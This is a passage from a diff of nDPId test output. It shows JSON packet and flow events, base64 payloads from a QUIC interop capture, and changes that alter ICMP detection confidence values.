rgBlBR7LYtLcvCmtn0DIMTAiPE\/xh01OGF5bAJQ2pznCPuONfdxbRDf26\/K7Vorl6tUQm\/NY5ROm8iHLzI4aMVUF0HjSu3+YUC1uhFUVddfTvpusRwaZ7kJNAa7P\/Vy96rw+N1QmHoKrViF3SiU98y7yZQbZlWxDFuBm3kfHuLnWeUnH4lwkgdmjgDw\/tGYT9JNO+a4WXT0WG+E149U5CDNgHVyClW14kVzq2L5mwgYWZMAo+lEamoeJB5h9+NMm0nQlLQivIZYDxop0vohOxK5n93lmaDplwC7Jat5ImroXJjGBA1i\/wWMXgstJIth+GejqRDCbbbeG7NxvZ9rVNx+l6f970K8CtZlugC3GRbFE9tMsDJl5zdBgPz83kXeLW4WfxGljbZ2I1\/Fsv5Dj9XTubdhAYt4ThM0knFSb5aX6Ff26rVq4Lfqy9HtKxEerRRn\/GPQ4yjlBfNoPdWIbjRC7TEbcUSnLf\/aCaXXZvuxf7r562GmcMeGxyHBQBVeTMDY1abEs7sWm\/+SOMgorJmIj9ISqcpplInrkBzayKhF83lHHurhCA1lrKNlSdpeepOLCf\/jMxhKTDSGOt6PuvUNMjvuJNj7JdWjB1qgt+7yg6GfadVoLlc7oKEmP2EZkbg1reAwAQOQU0SIVyNqN7R8++hQVFb9WO4t2FPgkjCkOeg8PKyC0+NKn6ths3s033xQ7XDByeP8Nn2kj5mf2ZY2gISmQLZEcrz0CUqG\/ia+5tqLKj4+\/Cndt6cFxpPnK+zzcl+5uVQbgnRXQJmrxZO\/AIu15jMIC2BXo7iG1s9T31lFVuK8ZWVw0cL8LlBKwlz8kc+VhdGPCJrGwt3wYzDhn2EetnDAIMnbnceC6ASm4ceWPn7zfseGSdZHnqg2ItW2chn2XlcQp4yI6MIqqKBep7wjkYIzq1Xg27JeDrqOB5eSz5nPdiU3VaODgQWCUUbg9ghrJZfwLkGvswGRALf+EzPBVkuJnFi0tcoasUB17bL2uvxmMJsQHWFO1QguLm7aeVi4DCA7LeprVfnREJzlwtTcq1k5DYJjUcopXIzceZ1RbGyvZp4+Cg3kMpFGVYKly62GUic6\/xL1lutLalr\/JjiJp45zRjU0jch7XG6sx+An4xZJK0US\/g0Kv\/HVtYynUrwZXu\/woHqvI9+NK8siaNZbHMUKRkIGOXCg9aT\/yvWLUSR9BuvtiEH\/8yVs7NtMMrdgpTQTivJT44BZN6SO0WXldGZUkYPP9OVZchj36EQYpACosyteNK+R\/3v7MWWO4pEsgkp64XBxw2OWJLRgsbR2Yz5fH7LkIbs0gEHDj7\/gcfuV5kb5ePRim1rmsSUQI+hvJlOF3Hyyb3A9HUl2d7fhX4v+4KZA=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1603816434848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1603816434848,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA3DrxAAOER4SQocL88wKgBgBFS0h8AI+oo4AAAAAAACHAbjQjU2gF9\/wAAIP8AAB2a+srq"} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434855,"flow_last_seen":1603816434855,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816434855,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1603816434855,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1603816434855,"pkt":"pJGxgjQ5PKn0qB\/sCABFwABTzwsAAEABAQrAqAGAKHC\/PAMDpwYAAAAARQAANz5UQADiEbCMKHC\/PMCoAYARUbXwACMeH\/IAAAAAAAhSHVi6EOpzIP8AACD\/AAAdujqKGg=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434855,"flow_last_seen":1603816434855,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816434855,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.724892} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434855,"flow_last_seen":1603816434855,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816434855,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.724892} 02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1603816434858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434858,"pkt":"pJGxgjQ5PKn0qB\/sht1gAxFJBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUr3wRUgTYu\/LHCgoKCgi+3m+0woW7wAAARL7GquBTGstjJfkM0HNCxgIAREBilxluQhOJlSo3RAJ3sT9YPO\/sQIsdu3\/IepBfUNrpFqupXs61nKnqxJbpzxm4pP4Uet+yqKBfL+M5sZl9PAH7Jj\/GqWj5hATKgnFlarPfqBSj9ebDuM9wxcuFyTqW04DSxk68M1O0uEKdC3hX6Nasxll7WkuCJBNdHdhbRwkrTxC93fxA7Bo+1ttTS+SluGuitxn3q\/f1rhqU3Rtof6iLtaCMP0POUaELPjXeochFM+KP8w+TYjbP1UR+98l3xiMRsa7Boz\/Qn6\/B9lV05gqwE+V+ndrFgiC6SU2W1mGV5dAwfiTvH0i+sGYWDheOhTxFh6v8dwHFK7yfV+qBRnmZIuILrC0ZVc8DVJxRZ00C\/VbecBGOpvKklKxAhnnr4FaiLAx4of\/xkA7t65SFTPGeySaODDta0iajRz3Okg02VlMpJCp4MYtxYVLkYQJvT4qBY\/Q3SYLhujBzrXGbyPfARPZmwKI+Y09++2g8fVjcnUT7cUy2MYcUv3gS8YX693nsVG9GuYuD1Tpc8V\/QW\/ws803NpuGE0fKAOcl7K0x276q2yxhP4KOxhUYk5nzfMGdKYR8tOed7SIHx6I89XxqDLNj\/yeFLjKcS4vphg1MO3ZXRhQu5dGqvsBgmNLF0BLZQE2exAkHM5YlM2d+2Cf5jNJkQmQN96lH4hYOcq+3cMuM0nA85Rh1rVe7urpKa+zhkSNys+oQxwrcKrhB1E8ov6Ir8fjnl9I+CB2E1uCIrXxRxtwOS4nAygc4OHQ9E8aOsj2\/w2X7PRaEwVsM1LrOKeZdUF3LQvTK2DdFbDcrW178BHsEuvh0b\/WIkKQOYUw7iOzrs1SVYgZoQ968zdkRsGSxVafnB0RpYxFcTvGFDKuA6adIdu87Np0MEASWmobXOe+0750NQu\/52K496y+JfUKhL9v1vUZoJcxA4fRjfC7Bh08mLSoPcW2iuYUY5Qfwalz27W5Ykaj0l4a4+FKTTpRfNlIedHfrTqbsQ6rbIQr8tJ+81mqHbG9Zyr8zA2muAME8q9aJsgu+U1HLzCGfWgvZFEV2EknFvEylSdE1r8PywLZ7inFg9hamDgdP5uitPIq1K8RDkjORQoXcwTc3g4iux2RI7AaBEJ4aQ64IImqf2vmsA7Hm9gV4zbJ5GdvI+BL7kLlAKNgqCno4ViE2PY+dAn7DOvAESo8acbeQESQp7Rk3XM18OTLnXB+4WbgD8q7fXA+ECTUMkpHSzm+lB\/4uh\/yExcfDM5gQRfvC\/spXzxuIqVWl2moJyhaC686aJ4KP\/t4qLF+0UIdSblurMexwFEcHDduM5IRHawmbrUFCfEQ+n4o\/SryqiP6om0IN1nAFm1ylhTzYdhrqGwZGRimjSXQBGvHoRTYsAlUs8s7gIQ9BZOAZT5zXBTy9plxFRn0xuOTisgPDNearpDgC37gTQLBm56fc\/xKHrVFHO5kMHOj6NVCppn2SoJ6\/fLiZL3tw3F0wrYIRE9J7EJb3sJ1aGsgL3pCgWOt7Qvk25++jdWqnsAR14C4ICoJzYNOJ6kjejpAxjuQX8JcLxcnqs2SWXAF1o2jEryGZfGoV3+v\/u2H1\/3a+NF9jJ5g=="} 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1603816434861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":1603816434861,"pkt":"PKn0qB\/spJGxgjQ5ht1gCRGvACsRNCQAiQIAAAAA8DyR\/\/5ppFQgAQsHCsnVrqTT\/kdpHoB9EVHblQArGxDIAAAAAAAI\/VKHHlPIokDaehpK\/wAAHf8AAB7\/AAAf\/wAAIA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1603816434871,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":1603816434871,"pkt":"PKn0qB\/spJGxgjQ5CABFAAAvPS1AACoRkCmM4zRcwKgBgAG7k5gAGycshAAAAAAACPBGL7QnI4n3\/wAAHQ=="} @@ -279,7 +279,7 @@ 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1603816434880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434880,"pkt":"pJGxgjQ5PKn0qB\/sht1gAgKbBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmo4ERUgTY5TrBCgoKCghziEmCXfFrHwAARL5LtYR3ejPf\/p3z4CC05PowI2I8\/yhShfm5nPX+w2RMm09Epp7xl+kBRRhqGjOWMvDuvKtjnCZP4h43yInAnyoQy6CqAqM2X0CJjYqFRLzhwJbIqw2DVbxOowFB4MPGm0ZSauJhv35hdaMdrkpEWiZjZxAcIt9QXdAe3ei5ci4QFJrTlck2vWOijZIoEgmR7v8f3b2ShmI6CdJBBEhbx7x+xdhmvF7QyLqpOKHrLTEfG+pOv4\/x0hdm8B4rKN9lYhLlGSoGddMbooBzzRUA7p16+7rbjImGPkS1MotpttG8+odH6+SDLBY+X3GstYZ1FO\/bzamHEZxYZMgP1ghrma\/s7dEMtCivJ8V9DDtANnntchI6kgniK9bzzOeDCsdM9ITRIlN2z\/Af3okU9roB71yq\/9DX\/TdkJvaU2WO+UeMMmr8r9mAF+UKfPefAvtmM4XpTI7S0sOggW9+ylbRk868BabyiGaalY7v6ElyxYQX5Lm+7f22jDAR\/1Rxw+pqMGJoYSAUT0vcKEq7ImLo5wdD1HbPPsQSmOUj6sUs4CO\/fnKY8anJpGjgDy0aXUYk8jHpkks0Ogglg+nRuCH++j5UW1f7ZAEpNa9vxdlT60Esd66TkVHOw+4sOrTBkOSin7f9JufqnL0\/oha9fVnFNoEifDQokis3kLSU3qOhha5NehjGyqXC4mPnsRXhV1FSJLx2VGefOAKopFDtlBUj77lmzpE4bT3pVw7XDcnU98fJgVGUI0JycRmnYXeBdfKKKe\/C3yD3TJtdWJpUxFWlLU5JBLw1DK7Jaeoa2CHR+Mm+Uos1NDX1p\/Tae7YJ3QTohWBSmBEM8sQU24dwTVN4u9NduhdNUw4abqXZHWWatpGkhOGi+ztCmJQyFuKmz76ia0aYCpdIQEteOm4a+0nCcqQW98i\/PWMOzXN5N4iJBlj7Z1kEIRjKqOh15d3MSiivlm0kY3uvwpzNG6z\/mG64H\/Ch0ZjLDFL0Lh7Mq4u7sR0TzJNJGk7sVaiEPpK8iv5ewweeTFC5Rl0GpKG2cTtrRDh3Jlv0fDheeAqwjrpXOD7ekCHhXvPoBEqPIW59s0aKn33+\/B+x4kneJZP\/w76GqJhpArO5oYmd2nyPv2SM++J5j4el8Gz8DMsGeqEBtxHDWRjkM1rYAvTzN5xb8x5DuFADLFqHlRDraOgEM0xdsEf3hQUK7mhuUCaQGZBsNRdHnNvZL2CgICOnYLx\/yP6eBn+tj4fdyypHuoUxCV0l91OyAz1zzMppQmM\/MZw4IjgKddLGGzkfD9eH5L2StADzoe\/+tl+Vy4q2cConEMFDs6PaRjEIki+cwlbYxOX5IGAOH+nU45b+AhHH3CTnzqcfB1hVJ27u+6GOUu8zMsLgjDTrc3Bi318\/NgqlATYv79utqKeVxozT3TLQMpSZijN7B8+4KqJeZKEmn2cSaCzlZY7LsE5mGMSEER6hyX0D9p3bjlWs1ZL9V6nrrfHoSzPveONxywVsTghmtxCvne0EGPCkAlJjIUsDS0C0WhRU05kFBDzqpkLuoJAtfN6wRz1A7m00svwCrcx6jydEIcQPaUg5llHIZhpOg+oB895RjVpCjMpMpvctTtfDIJJw1H3cf+g=="} 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434886,"flow_last_seen":1603816434886,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434886,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 01192{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1603816434886,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434886,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAYQkAAC0BE6WF8s70wKgBgAMDPAcAAAAARQAFAILLQAApEbMSwKgBgIXyzvS\/\/xFRBOzO1McKCgoKCBW0hlcD4wtQAABE0o5ETsyCKfAiv3GjrhWWAHytWjhKjuCcE8PQ+8\/rlGyAU8f1x+Mk3FCdRieZy\/gIKc\/JJBqsu6Id+Y5I6UUEss09jcswdjUwYmczoGMjYqPo0TgEgq07LxXN2ezzpPgN8+p4f8xWtCxwb8JafjHIFjRWKZy5A\/ktd7oDLtros16gjzk4ANxurCLBEjXn1mc4A1OkxNBYnuq2VBy6bBpOv61yDRD8YC\/\/cKt+DeKlIab2wioxKuuqTJaa6bcvjsxaGxss1fmXynI35PYXkvPyrb+OmmsPeoZV51Hz2RzGwPglrJrYbrEQT\/ivLiFpZ023Tc\/UX5\/6yEdVpklz8RpLexVa6Bn2z1jbV1c+PvjbnEyP4B3XT1q2R1U8Zg+Hg2foBKQpPal7OLyEEZLoYQ0+yrbDuTkJcdCxkssUJpGttMtaDpOYAt3rqklkL5jPHrEd1C+FSNb\/c7TK\/C4zJ9DojLveQhKMASAjgDcBaayNHzmzBxrLpcHuZ77JWq9eQca55sxDzWYh2vyNpayRp3s936eLgTzDYJED3HFsEu7Un7VVKrpKCJGjDAw7oK0mEPfQD9p25UX36n9yQOALJibj1tF+6rPwcqd1enHsqJO2F24HI5WHL0GiGGP5cRaXpNzZ+ijbLCxtX7NKJN8+IHswHT8wg8Yb1lU="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434886,"flow_last_seen":1603816434886,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434886,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.612374} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434886,"flow_last_seen":1603816434886,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434886,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.612374} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1603816434890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1603816434890,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA3dApAADIRazjK7txcwKgBgAG7mBUAI5npkwAAAAAACEmkvxz+BSBNGio6Sv8AACD\/AAAd"} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1603816434894,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434894,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAwXZAAEARa1\/AqAGAilu8k6XkEVEE7KGrwQoKCgoIR0aH1pvahxkAAETSKZaHE9N9GtJMYvv9ifpVeuysckzKOAoBynmJqbZIyXXd6Q0OaiDA1+eXkNpoukJH66d1qZWl2up+oJkJlE2iNPjRL4rTXi4tGFWkOc7OU1ijBfm7sZPOTclysKOTLlG\/wLwmM+4bmiv8t1VJI8ny49KjxXkbGme9dgA0bkSUFasSUnlJAUa50AK97fShfQXzqeK5Dg+WXkJ5xuGOQHrunpIaEPTkH8dZAQC0kgGeFDv4HG0pqkwbzV+IYkH7SmFammklwji5+p3TbOylB01wJbffLThybxWnDqogivkmpQmkVpMhBwMu\/9xKEoVlmIM6B4v9QOFFHqhSd9Fs3q++BMu\/YhweSpnGUx72yfkjBJM\/IRzi1GX4pw11eJz1\/3qBdeWldk+sRUQcox4In2qe+wuxVw2osgoNlI9YvrG4D8P\/zIyWUtdNaLtHhPMgDgiAC91NDmgmJENXcA\/RXPQYvhOdBOfaMfqQoVoSR7Q4FTIccfFsCF+5xHFnMAndfXwOCyIdbeaeIVCpMSQ3bCvvDIsU716Wq\/5J449XPD5T8+ox9fqnlN0Jxyqab0XJ72k9txuNkHNYBZFINRTioCXl6izgIEtcruHCYZt+ILtV2gUUjuR8FtecwJtSSrY5wTZrfp6mz9U9VqFe6kCmkDBYZVE9CTSh5jPIMshdFPvlPyb9jOL5Oce8EEmxF50G+MImURL0E5jw4S6VFP1JWS9s3SOl2ok90TOvvWFQkYQVIGjzaMpXtyBqGjbtpCnFbad8ojifR\/YqGipZKY7YjkWGjouJV\/EDirr0Js9ZOS2bLt0d5OKTRnFRrYMUX7KY8zvzFslodkxSsLJ9F5kbgxZelMuuAZS\/WjzvvYQWm+fu6fqiOFgxzt4cf5I3rtZr1vhb\/mlhSZdfx+5dh2+Bw05\/c+ZhZcGWQVWlIJoLVTK8wVhhxCprdVxcD8azYdyGHI2yjdhdg8y5T1SHS+wMUv3TrTEkgaPMJSS\/bG830bq4zk9YF1gPTLVzdsj3uGV0Cb2GuAxyajIFBjWG43Q+tx8KNtdSeW621EE8H3LtU5Co2FzEFLWry1aFgbJB2zQ2iUthr7o+cxvl+I9ObWsbtyiFbbosM9ubsa940D830mP6uzArtiDHR\/\/tFLOFL88JLiryCWee0dBawNwyN0l3KoWaf0+xrkvJmDrQtP2edAcztmf7vS5YtS7p+DLQu7CH9K63Utaw3a3fUEMW7mKw5KR+OTvLaDXf+fl5pRlYNEqDRWXH4I909g6Vz4OrKab3fRk6tpbyc6YOZkWMRgcj4QWKv9Jjdy\/GO0VWic\/I9O\/C9pHvyAImGRQQ3Dlm9KvoTkJ8oWVAyBE0qeiaF6eLmq95FTaIvn+MgWKZGoMFAxQpObBG41iLXc68P\/q28rKfRP2cjjT0E2a5yH6RR4ZhTZalehf32S79m5P3+jb7+Xyy8XIUQjKRHLykyRjpXm2fvzGkfd\/uvjbx1WH97nbN6TLHvxcWmIC9p8hr1ew6jGo88bbJUcg867GJeVKG4nDMxlqcviS+1Hf8Ar25WRbo1aTF5rpBjU67mAtQodxvng7drgHRjfXYl0zhU6OqWR+vayEfq8beOLohWXa2bFgOH+TtDLfzLUWOS7634STReD98JKgMwA=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1603816434897,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434897,"pkt":"PKn0qB\/spJGxgjQ5ht1gCwDeACMRMCABSAB4FwEBvnZO\/\/4EYx0gAQsHCsnVrqTT\/kdpHoB9EVHPlAAjX2HlAAAAAAAIQNHw6Rif2eH\/AAAd\/wAAGxoqOko="} @@ -299,7 +299,7 @@ 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1603816435011,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":145,"pkt_l4_len":91,"thread_ts_msec":1603816435011,"pkt":"pJGxgjQ5PKn0qB\/sht1gCTD0AFs6QCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUAQQRVgAAAABgCRGvACsRNCQAiQIAAAAA8DyR\/\/5ppFQgAQsHCsnVrqTT\/kdpHoB9EVHblQArPxCkAAAAAAAI\/VKHHlPIokDaehpK\/wAAHf8AAB7\/AAAf\/wAAIA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816435020,"flow_last_seen":1603816435020,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816435020,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1603816435020,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1603816435020,"pkt":"pJGxgjQ5PKn0qB\/sCABFwABLWwEAAEABm4nAqAGAjOM0XAMDgJEAAAAARQAALz1HQAAqEZAPjOM0XMCoAYABu5OYABvoK8MAAAAAAAjwRi+0JyOJ9\/8AAB0="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816435020,"flow_last_seen":1603816435020,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816435020,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.659827} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816435020,"flow_last_seen":1603816435020,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816435020,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.659827} 02153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1603816435020,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816435020,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAaXxAAEARbePAqAGAg58YxobPAbsE7CCRywoKCgoIJv2XczUh4RIAAETSbCxdVvXUX9XjSdEekuKYBaaXvtdleeAoC7w0t1zysEAi8tmmk\/irguMUfevsR+4Ix3ykT3XI5ywdd9iZ2jEEpXdKcBNTILwVo9RsE2t9EwWhoq5\/2T\/d0RKrFr8WtXqw8R81Lc9NfiQcl+03MG9MvRdcSultVc\/J1\/ZsUKnUEchEiSxzxC+Bh9AJTZqdlAjdxHnzTMm8xi3GQm6bMwAMTxvoRcjoGFuP\/jsOpyTpax0np5jI5wvAneUYSZi\/TgHF\/m8zKEHvyg7GMb3qHu7n\/RSycakCUo6vcofHTkxeQVCCRngbPUJ9tSzw1NtS2gM31yeDwbXURmAo9cCWFob2vDSUwjpS5E4Bzmlgq4msvVlsTMrZEpAhNoUHdjHy4QjtukGArqr5ysTKErAC4Awr5rI3yHlLGqm+45AjHIVXYBIC02L4V+2\/NakDwhKYWvsC8fxBwr7XFo9wng0iEMUuvvwpf3rRyeyquDhJCKiPgZqbE4vibuLP3YjbRmkwnzwoxp4JbGmV6sCYODAB+6uR9yWT2DvYh2Rb\/rOtm0wd1MTHRHgjq65\/Q9ZAV73R3b3X9eYSSjZWx+KotHN704t02EkkPjksNKXNye16bccDD5IXgwJUTDiyc6d0LRseUDRuGQDw0kuZ+ll0kG2i4WlqtUdTnp8918DucjmW2VDKzNjeIA39VHQWqziQ1ddqPEX2hN++O4sXWiPb63hxUkBl\/1utZAUStyF7eS3pGlLVhZF\/znUUZa3M+0DGGywvSBI2oj4pSimzVz7N20pvszlriqxtYYleocY\/YE3jUUemgCpo75mWgtJOBRyLbyK9A6hraxh7Olf0MRas13AcLep+ICMnSJfWbjp\/GkdnPkR\/C5xIcrNwENdzdFsACnHqaoD2O6863JhZYdMEnWVSkYIq+Qo3evifk+os89mbDYj7FZGfwtqfdt3rABEss73A7ji44N9TcuujgLAvCHsKuJvwI7zuwPeUe9hxI\/RPeoFnolmIFjlDPLJQoIkxVdnaINbjrLTY2LfZda6\/LCv8sM\/bd\/AmWDDDh73GxJl1z703OS5uL1l7MQlkB\/g4ilEAjMQXXXHecuH\/deyjep8GWLhkSiTJ4HHr+05f4SIdPiicarLt9LEk2eLRpP+UFPH